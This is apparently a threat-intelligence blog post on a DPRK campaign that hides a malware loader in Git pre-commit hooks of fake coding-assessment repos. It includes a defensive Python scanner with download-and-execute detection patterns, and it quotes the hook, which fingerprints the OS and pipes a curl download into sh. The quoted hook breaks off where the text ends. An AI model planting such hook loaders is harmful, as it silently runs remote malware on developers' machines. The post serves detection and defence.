Lazarus Group Uses Git Hooks To Hide Malware

2026-05-05, OSM
https://opensourcemalware.com/blog/dprk-git-hooks-malware
#ContagiousInterview #Lazarus #TasksJacker

DPRK's Contagious Interview / TaskJacker campaign is now hiding its second-stage loader inside Git hooks that download the InvisibleFerret and BeaverTail malware

6mile, May 6, 2026
Tags: github, lazarus, dprk, contagious-interview, taskjacker, supply-chain, north-korea, threat-intelligence, malware

Image: Contagious Interview pre-commit loader

The OpenSourceMalware team has spotted a fresh twist in the DPRK's Contagious Interview / TaskJacker playbook: the operators have pivoted away from stuffing their stage-2 loader into .vscode/tasks.json, package.json postinstall scripts, or fake .woff2 font files, and are now hiding it inside Git hooks. The candidate clones the "coding assessment" repo, and the first time they commit, the pre-commit hook runs the loader before the commit object is even written. One detail worth keeping in mind when you triage a repo like this: Git never runs hooks that are merely tracked in the repository. A checked-in .githooks/ directory only fires once something sets core.hooksPath to point at it, so whatever the candidate is told to run first (an install script, a package.json "prepare" script, a "run this once" command) is part of the chain, not incidental setup.
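A pre-flight check for the clone, as an added example (not code from the OpenSourceMalware post, the campaign, or any tool the page describes): it reads core.hooksPath from .git/config, looks at tracked hook directories and at package.json scripts that would set core.hooksPath, and flags hook scripts that fingerprint the OS and pipe a download into a shell, the shape of the loader described here. The sample repository it builds, the inert example.invalid URL in its hook, and the indicator patterns are constructed assumptions, not observed campaign artifacts.

```python
"""Pre-flight audit of a cloned repo for Git-hook loaders. Added example, not code from the
OpenSourceMalware post or the campaign: it finds how a hook gets wired in (core.hooksPath in
.git/config, tracked hook dirs, a package.json script that sets core.hooksPath) and flags hook
scripts that fingerprint the OS and pipe a download into a shell. The sample repo is constructed."""
import json
import re
import tempfile
from pathlib import Path

TRACKED_HOOK_DIRS = (".githooks", ".husky", "hooks")  # inert until a setup step wires them in

# Heuristic indicators of a download-and-run loader (assumptions, not a signature set).
INDICATORS = {
    "download-and-execute": re.compile(
        r"\b(curl|wget|Invoke-WebRequest|iwr)\b[^\n|]*\|\s*"
        r"(sh|bash|zsh|dash|python3?|node|perl|cmd(\.exe)?|powershell|iex)\b", re.I),
    "os-fingerprint": re.compile(r"\buname\s+-[a-z]*s\b|\$OSTYPE|\bsw_vers\b"),
    "remote-url": re.compile(r"https?://[^\s'\"]+", re.I),
    "silenced": re.compile(r">\s*/dev/null\s+2>&1|2>/dev/null"),
}

def parse_hooks_path(config_text):
    """core.hooksPath from a .git/config body, or None (INI-like, case-insensitive keys)."""
    section = None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r'\[([^\]\s]+)(?:\s+"[^"]*")?\]$', line)
        if header:
            section = header.group(1).lower()
            continue
        kv = re.match(r"([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*)$", line)
        if section == "core" and kv and kv.group(1).lower() == "hookspath":
            return kv.group(2).strip().strip('"')
    return None

def scan_text(text):
    """Names of INDICATORS matching a hook body, sorted for stable output."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def audit_repo(repo_root):
    """Report how hooks are wired and which hook scripts look like loaders."""
    root = Path(repo_root).resolve()
    report = {"hooks_path": None, "wiring": [], "hooks": []}
    cfg = root / ".git" / "config"
    if cfg.is_file():
        report["hooks_path"] = parse_hooks_path(cfg.read_text(errors="replace"))
    # A script that sets core.hooksPath makes a tracked dir live once the candidate runs "npm install".
    pkg = root / "package.json"
    if pkg.is_file():
        try:
            scripts = json.loads(pkg.read_text(errors="replace")).get("scripts", {})
        except json.JSONDecodeError:
            scripts = {}
        for name, cmd in scripts.items():
            if re.search(r"core\.hooksPath|husky", str(cmd), re.I):
                report["wiring"].append(f"package.json scripts.{name}: {cmd}")
    hook_dirs = [root / ".git" / "hooks"]
    if report["hooks_path"]:
        hook_dirs.append(root / report["hooks_path"])  # relative paths resolve against the work tree
    hook_dirs += [root / d for d in TRACKED_HOOK_DIRS]
    for d in sorted({p.resolve() for p in hook_dirs}):  # dedupe: hooksPath often names a tracked dir
        if not d.is_dir():
            continue
        for f in sorted(d.iterdir()):
            if not f.is_file() or f.name.endswith(".sample"):
                continue  # Git's stock *.sample hooks never run
            indicators = scan_text(f.read_text(errors="replace"))
            if indicators:
                rel = f.relative_to(root).as_posix() if f.is_relative_to(root) else str(f)
                report["hooks"].append({"path": rel, "indicators": indicators})
    return report

# Constructed stand-in for the page's loader: same shape, inert URL.
SAMPLE_HOOK = """#!/bin/sh
uname_s="$(uname -s 2>/dev/null || echo unknown)"
case "$uname_s" in
  Darwin) curl -s 'https://example.invalid/settings/mac?flag=5' | sh >/dev/null 2>&1; exit 0 ;;
esac
"""

def build_sample_repo(root):
    """Fake 'coding assessment' clone: wired .git/config, tracked hook, prepare script."""
    root = Path(root)
    (root / ".git").mkdir(parents=True)
    (root / ".git" / "config").write_text("[core]\n\tbare = false\n\thooksPath = .githooks\n")
    (root / ".githooks").mkdir()
    (root / ".githooks" / "pre-commit").write_text(SAMPLE_HOOK)
    (root / "package.json").write_text(json.dumps({"name": "coding-assessment",
        "scripts": {"prepare": "git config core.hooksPath .githooks"}}))
    return root

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return audit_repo(build_sample_repo(Path(tmp) / "assessment"))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run audit_repo(path) against a clone before npm install or the first commit; a wiring hit together with a hooks entry is exactly the chain the post describes. The patterns are heuristics, so read a clean report as "nothing obvious", not as a clearance, and remember that only executable hook files run on Unix, which the scanner deliberately does not use as a reason to skip a file.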

What the hook actually does
The malicious .githooks/pre-commit script is short, which is the whole point — it's a thin loader that fingerprints the OS via uname -s, then curls or wgets a per-platform payload from precommit.vercel.app and pipes it straight into a shell or cmd.exe:

#!/bin/sh
uname_s="$(uname -s 2>/dev/null || echo unknown)"
case "$uname_s" in
  Darwin)
    curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh >/dev/null 2>&1
    exit 0